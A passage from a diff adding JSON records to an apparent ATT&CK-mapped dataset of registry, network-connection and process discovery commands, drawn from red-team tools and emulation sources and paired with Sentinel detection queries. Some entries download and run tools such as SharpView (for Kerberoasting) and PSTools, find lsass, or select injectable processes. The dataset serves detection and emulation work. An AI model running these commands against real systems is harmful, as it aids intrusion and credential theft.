"mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100149", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100150", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": 
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100151", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100152", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100153", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100154", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", 
+ "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100155", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100156", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100157", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100158", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100159", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + 
"sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100160", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100161", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100162", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100163", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "registry_value": "", + "file_path": "", + "file_value": "", + 
"frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "chain_id": "100164", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg (query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "query_registry", + "mitre_attack": "T1012", + "itw_sample": "" + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_cached_rdpconnection", + "ATT&CK Technique #1": "T1012", + "ATT&CK Technique #2": "", + "Technique": "Query Registry", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_cached_rdpconnection\": [\"T1012\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3 and process_path contains \"reg.exe\" and process_command_line contains \"reg query\"", + "name": "Query Registry Network" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_path contains \"reg.exe\" and process_command_line contains \"reg query\"", + "name": "Query Registry Process" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "Windows Registry" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "LOG-MD Reg Compare", + "Windows Registry" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": 
"created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + 
"relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key access", + "description": "A registry key was accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "windows registry key" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one 
thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/may/emissary-panda-a-potential-new-malicious-tool/", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1049", + "command_list": [ + "netstat -ano[b] ", + "shell c:\\windows\\sysnative\\netstat.exe -ano[b]", + "post/windows/gather/tcpnetstat", + "net session | find / \"\\\\\"", + "shell net session | find / \"\\\\\"", + "post/windows/gather/enum_logged_on_users", + "netstat\nnet use\nnet sessions\n", + "Get-NetTCPConnection\n", + "netstat\nwho -a\n", + "$syntaxList = #{syntax}\nforeach ($syntax in $syntaxList) {\n#{SharpView} $syntax -}\n", + "$syntaxList = #{syntax}\nforeach ($syntax in $syntaxList) {\nPathToAtomicsFolder\\T1049\\bin\\SharpView.exe $syntax -}\n", + "$syntaxList = \"Invoke-ACLScanner\", \"Invoke-Kerberoast\", \"Find-DomainShare\" \n\nforeach ($syntax in $syntaxList) {\n#{SharpView} $syntax -}\n", + "netstat -anto\n", + "netstat -anto;\nGet-NetTCPConnection\n", + "powershell/situational_awareness/host/monitortcpconnections", + "powershell/situational_awareness/network/powerview/get_rdp_session" + ], + "commands": [ + { + "command": "netstat -ano[b] ", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell c:\\windows\\sysnative\\netstat.exe -ano[b]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/gather/tcpnetstat", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "net session | find / \"\\\\\"", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell net session | find / \"\\\\\"", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/gather/enum_logged_on_users", + "source": 
"https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "netstat\nnet use\nnet sessions\n", + "source": "atomics/T1049/T1049.yaml", + "name": "Atomic Red Team Test - System Network Connections Discovery" + }, + { + "command": "Get-NetTCPConnection\n", + "source": "atomics/T1049/T1049.yaml", + "name": "Atomic Red Team Test - System Network Connections Discovery" + }, + { + "command": "netstat\nwho -a\n", + "source": "atomics/T1049/T1049.yaml", + "name": "Atomic Red Team Test - System Network Connections Discovery" + }, + { + "command": "$syntaxList = #{syntax}\nforeach ($syntax in $syntaxList) {\n#{SharpView} $syntax -}\n", + "source": "atomics/T1049/T1049.yaml", + "name": "Atomic Red Team Test - System Network Connections Discovery" + }, + { + "command": "$syntaxList = #{syntax}\nforeach ($syntax in $syntaxList) {\nPathToAtomicsFolder\\T1049\\bin\\SharpView.exe $syntax -}\n", + "source": "atomics/T1049/T1049.yaml", + "name": "Atomic Red Team Test - System Network Connections Discovery" + }, + { + "command": "$syntaxList = \"Invoke-ACLScanner\", \"Invoke-Kerberoast\", \"Find-DomainShare\" \n\nforeach ($syntax in $syntaxList) {\n#{SharpView} $syntax -}\n", + "source": "atomics/T1049/T1049.yaml", + "name": "Atomic Red Team Test - System Network Connections Discovery" + }, + { + "command": "netstat -anto\n", + "source": "data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml", + "name": "Find System Network Connections" + }, + { + "command": "netstat -anto;\nGet-NetTCPConnection\n", + "source": "data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml", + "name": "Find System Network Connections" + }, + { + "command": "powershell/situational_awareness/host/monitortcpconnections", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": 
"powershell/situational_awareness/network/powerview/get_rdp_session", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1049", + "Built-in Windows Command": "netstat -ano[b] ", + "Cobalt Strike": "shell c:\\windows\\sysnative\\netstat.exe -ano[b]", + "Metasploit": "post/windows/gather/tcpnetstat", + "Description": "Display current TCP/IP network connections (b requires elevated privs so you can see the process that opened the connection)" + }, + { + "Category": "T1049", + "Built-in Windows Command": "net session | find / \"\\\\\"", + "Cobalt Strike": "shell net session | find / \"\\\\\"", + "Metasploit": "post/windows/gather/enum_logged_on_users", + "Description": "Display the list of active SMB sessions on the workstation so you can see which users have active connections." + }, + { + "attack_technique": "T1049", + "display_name": "System Network Connections Discovery", + "atomic_tests": [ + { + "name": "System Network Connections Discovery", + "auto_generated_guid": "0940a971-809a-48f1-9c4d-b1d785e96ee5", + "description": "Get a listing of network connections.\n\nUpon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netstat\nnet use\nnet sessions\n", + "name": "command_prompt" + } + }, + { + "name": "System Network Connections Discovery with PowerShell", + "auto_generated_guid": "f069f0f1-baad-4831-aa2b-eddac4baac4a", + "description": "Get a listing of network connections.\n\nUpon successful execution, powershell.exe will execute `get-NetTCPConnection`. 
Results will output via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Get-NetTCPConnection\n", + "name": "powershell" + } + }, + { + "name": "System Network Connections Discovery Linux & MacOS", + "auto_generated_guid": "9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2", + "description": "Get a listing of network connections.\n\nUpon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.\n", + "supported_platforms": [ + "linux", + "macos" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if netstat command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v netstat)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "echo \"Install netstat on the machine.\"; exit 1;\n" + } + ], + "executor": { + "command": "netstat\nwho -a\n", + "name": "sh" + } + }, + { + "name": "System Discovery using SharpView", + "auto_generated_guid": "96f974bb-a0da-4d87-a744-ff33e73367e9", + "description": "Get a listing of network connections, domains, domain users, and etc. \nsharpview.exe located in the bin folder, an opensource red-team tool.\nUpon successful execution, cmd.exe will execute sharpview.exe . 
Results will output via stdout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "SharpView_url": { + "description": "sharpview download URL", + "type": "Url", + "default": "https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true" + }, + "SharpView": { + "description": "Path of the executable opensource redteam tool used for the performing this atomic.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1049\\bin\\SharpView.exe" + }, + "syntax": { + "description": "Arguements method used along with SharpView to get listing of network connections, domains, domain users, and etc.", + "type": "String", + "default": "\"Invoke-ACLScanner\", \"Invoke-Kerberoast\", \"Find-DomainShare\" \n" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Sharpview.exe must exist on disk at specified location (#{SharpView})\n", + "prereq_command": "if (Test-Path #{SharpView}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest #{SharpView_url} -OutFile \"#{SharpView}\"\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": true, + "command": "$syntaxList = #{syntax}\nforeach ($syntax in $syntaxList) {\n#{SharpView} $syntax -}\n" + } + } + ] + }, + { + "id": "638fb6bb-ba39-4285-93d1-7e4775b033a8", + "name": "Find System Network Connections", + "description": "Find System Network Connections", + "tactic": "discovery", + "technique": { + "attack_id": "T1049", + "name": "System Network Connections Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "netstat -anto\n" + } + }, + "linux": { + "sh": { + "command": "netstat -anto\n" + } + }, + "windows": { + "psh": { + "command": "netstat -anto;\nGet-NetTCPConnection\n" + } + } + } + }, + { + "Empire Module": "powershell/situational_awareness/host/monitortcpconnections", + 
"ATT&CK Technique #1": "T1049", + "ATT&CK Technique #2": "", + "Technique": "System Network Connections Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/monitortcpconnections\": [\"T1049\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_rdp_session", + "ATT&CK Technique #1": "T1049", + "ATT&CK Technique #2": "", + "Technique": "System Network Connections Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_rdp_session\": [\"T1049\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"net.exe\"or process_path contains \"netstat.exe\")and (process_command_line contains \"*net* use*\"or process_command_line contains \"*net* sessions*\"or process_command_line contains \"*net* file*\"or process_command_line contains \"*netstat*\")or process_command_line contains \"*Get-NetTCPConnection*\"", + "name": "System Network Connections Discovery" + } + ], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + 
"description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os 
api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://www.fireeye.com/blog/threat-research/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://securelist.com/poseidon-group-a-targeted-attack-boutique-specializing-in-global-cyber-espionage/73673/", + 
"https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1057", + "command_list": [ + "tasklist /v [/svc]\nnet start\nqprocess *", + "ps\nshell tasklist /v [/svc]\nshell net start", + "ps\npost/windows/gather/enum_services", + "ps >> /tmp/loot.txt\nps aux >> /tmp/loot.txt\n", + "tasklist\n", + "Get-Process\n", + "get-wmiObject -class Win32_Process\n", + "wmic process get /format:list\n", + "$ps_url = \"https://download.sysinternals.com/files/PSTools.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"PSTools.zip\" -DestinationPath $staging_folder;\niex $staging_folder\"\\pslist.exe\" >> $env:LOCALAPPDATA\\output.log;\nRemove-Item $download_folder\"PSTools.zip\";\nRemove-Item $staging_folder -Recurse\n", + "acrnctl list\n", + "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\n$valid = foreach($p in $ps) { if($p.Owner -eq $env:USERNAME -And $p.ProcessName -eq \"svchost\") {$p} };\n$valid | ConvertTo-Json\n", + "$ps = get-process | select processname,Id;\n$valid = foreach($p in $ps) { if($p.ProcessName -eq \"lsass\") {$p} };\n$valid | ConvertTo-Json\n", + "ps\n", + "get-process\n", + "ps aux | grep #{host.user.name}\n", + "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\nforeach($p in $ps) {\n if($p.Owner -eq \"#{host.user.name}\") {\n $p;\n }\n}\n", + "get-process >> 
$env:APPDATA\\vmtools.log;\ncat $env:APPDATA\\vmtools.log\n", + "Get-Process", + "tasklist", + "ps aux", + "tasklist /m >> $env:APPDATA\\vmtool.log;\ncat $env:APPDATA\\vmtool.log\n", + "powershell/situational_awareness/host/paranoia", + "powershell/situational_awareness/network/powerview/process_hunter" + ], + "commands": [ + { + "command": "tasklist /v [/svc]\nnet start\nqprocess *", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "ps\nshell tasklist /v [/svc]\nshell net start", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "ps\npost/windows/gather/enum_services", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "ps >> /tmp/loot.txt\nps aux >> /tmp/loot.txt\n", + "source": "atomics/T1057/T1057.yaml", + "name": "Atomic Red Team Test - Process Discovery" + }, + { + "command": "tasklist\n", + "source": "atomics/T1057/T1057.yaml", + "name": "Atomic Red Team Test - Process Discovery" + }, + { + "command": "Get-Process\n", + "source": "atomics/T1057/T1057.yaml", + "name": "Atomic Red Team Test - Process Discovery" + }, + { + "command": "get-wmiObject -class Win32_Process\n", + "source": "atomics/T1057/T1057.yaml", + "name": "Atomic Red Team Test - Process Discovery" + }, + { + "command": "wmic process get /format:list\n", + "source": "atomics/T1057/T1057.yaml", + "name": "Atomic Red Team Test - Process Discovery" + }, + { + "command": "$ps_url = \"https://download.sysinternals.com/files/PSTools.zip\";\n$download_folder = \"C:\\Users\\Public\\\";\n$staging_folder = \"C:\\Users\\Public\\temp\";\nStart-BitsTransfer -Source $ps_url -Destination $download_folder;\nExpand-Archive -LiteralPath $download_folder\"PSTools.zip\" -DestinationPath $staging_folder;\niex $staging_folder\"\\pslist.exe\" >> 
$env:LOCALAPPDATA\\output.log;\nRemove-Item $download_folder\"PSTools.zip\";\nRemove-Item $staging_folder -Recurse\n", + "source": "data/abilities/collection/cc191baa-7472-4386-a2f4-42f203f1acfd.yml", + "name": "Process discovery via SysInternals pstool" + }, + { + "command": "acrnctl list\n", + "source": "data/abilities/discovery/0093c0e0-68b6-4cab-b0d4-2b40b3c78f71.yml", + "name": "Enumerate running virtual machines on hypervisor" + }, + { + "command": "$owners = @{};\ngwmi win32_process |% {$owners[$_.handle] = $_.getowner().user};\n$ps = get-process | select processname,Id,@{l=\"Owner\";e={$owners[$_.id.tostring()]}};\n$valid = foreach($p in $ps) { if($p.Owner -eq $env:USERNAME -And $p.ProcessName -eq \"svchost\") {$p} };\n$valid | ConvertTo-Json\n", + "source": "data/abilities/discovery/05cda6f6-2b1b-462e-bff1-845af94343f7.yml", + "name": "Discovers processes that the current user has the ability to access and selects an injectable one" + }, + { + "command": "$ps = get-process | select processname,Id;\n$valid = foreach($p in $ps) { if($p.ProcessName -eq \"lsass\") {$p} 